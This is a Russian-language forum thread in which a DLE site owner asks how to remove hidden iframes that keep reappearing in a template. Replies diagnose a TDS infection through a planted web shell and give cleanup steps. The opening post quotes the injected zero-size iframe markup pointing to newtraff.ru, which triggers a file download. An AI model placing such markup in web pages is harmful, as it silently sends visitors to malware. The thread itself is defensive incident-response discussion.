помогите убрать iframe

(Ответов: 6, Просмотров: 3060)
  1. Новичок
    • Регистрация: 09.10.2012
    • Сообщений: 20
    • Репутация: 0
    в шаблоне для DLE вставлен такой код:
    <iframe src="http://newtraff.ru/go.php?sid=3" width="0" height="0" frameborder="0"></iframe><iframe src="http://newtraff.ru/go.php?sid=3" width="0" height="0" frameborder="0"></iframe>

    между тегами Head, я его убираю, сохраняю изменения, но он опять выходит? это ссылка направляет на загрузку какого-то файла, как убрать этот код навсегда?
    • 0
  2. Sunshine reggae Аватар для OKyJIucT
    • Регистрация: 02.09.2011
    • Сообщений: 3,240
    • Репутация: 1830
    • Webmoney BL: ?
    Судя по всему, кто то пользуется дыркой на вашем сайте, налицо признаки Simple TDS.

    Надо движок скорей всего обновлять на официальный, ну или хотя бы не нуленный. Скорей всего шелл засел в каком то файле, с злоумышленник постоянно обновляет содержимое вашего сайта.

    На крайний случай, если обновление невозможно, зайдите на сервер под root-ом, и поставьте на файл main.tpl пользователя root. В этом случае злодей не сможет скорей всего заменить его содержимое.

    Даже вы не сможете скорей всего из админки отредактировать шаблон. Ну или попробуйте поставить на него права 444, однако в этом случае он может не открываться. Поэтому попробуйте оба варианта.

    Если не помогут, тогда только искать дырку, или обновить движок.
    • 0
  3. Гуру Аватар для ohmygod
    • Регистрация: 30.04.2011
    • Сообщений: 1,064
    • Репутация: 268
    • Webmoney BL: ?
    И пароли от хостинга/админки желательно потом поменять.
    • 0
  4. Студент
    • Регистрация: 13.07.2012
    • Сообщений: 38
    • Репутация: 4
    Скорее всего через дырку в каком то компоненте он влазиет. На одном сайте одного из клиентов на WP я удалил, но от влазил через компонент формы обратной связи. Отключил компонент, перестал залазить. Скопируйте сайт полностью себе на комп, поиском поищите ссылки на _newtraff.ru, может увидите где он еще прошит. Посмотрите даты изменения файлов, станет понятно где рылись и что меняли.
    • 0
  5. Опытный Аватар для izyalex
    • Регистрация: 20.11.2012
    • Сообщений: 254
    • Репутация: 38
    • Webmoney BL: ?
    Максуд,
    1. ищешь шеллы, смотришь дату создания файла, запоминаешь Ctrl+C
    2. идешь в логи доступа, делаешь выборку по дате создания шелла
    3. внимательно анализируешь пост запросы, тоже можно сделать выборку
    4. устраняешь дыру и радуешься спокойной жизни
    • 0
  6. Новичок
    • Регистрация: 09.10.2012
    • Сообщений: 20
    • Репутация: 0
    Всем спасибо за помощь, сегодня же все сделаю
    • 0
  7. Дипломник
    • Регистрация: 26.12.2011
    • Сообщений: 148
    • Репутация: 17
    Уже писал в подобной теме. Было такое неоднократно на сайтах клиентов. Однажды проблема не исчезла до тех пор, пока не перевез сайт на другой хостинг. ТС, удачи в решении проблемы.
    • 0

Похожие темы

Темы Раздел Ответов Последний пост
Помогите убрать ссылку!
DLE 6 22.10.2012 18:28
Помогите убрать записи из рубрик
WordPress 3 27.09.2012 20:21
Помогите убрать ссылки в подвале
WordPress 4 08.01.2012 18:29
Вирус прописал iframe в базу данных. Помогите разобраться!
Web программирование 5 30.01.2011 23:29
Помогите убрать ЗАРАЗУ !!!
Дорвеи и black SEO 3 16.10.2010 23:00

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры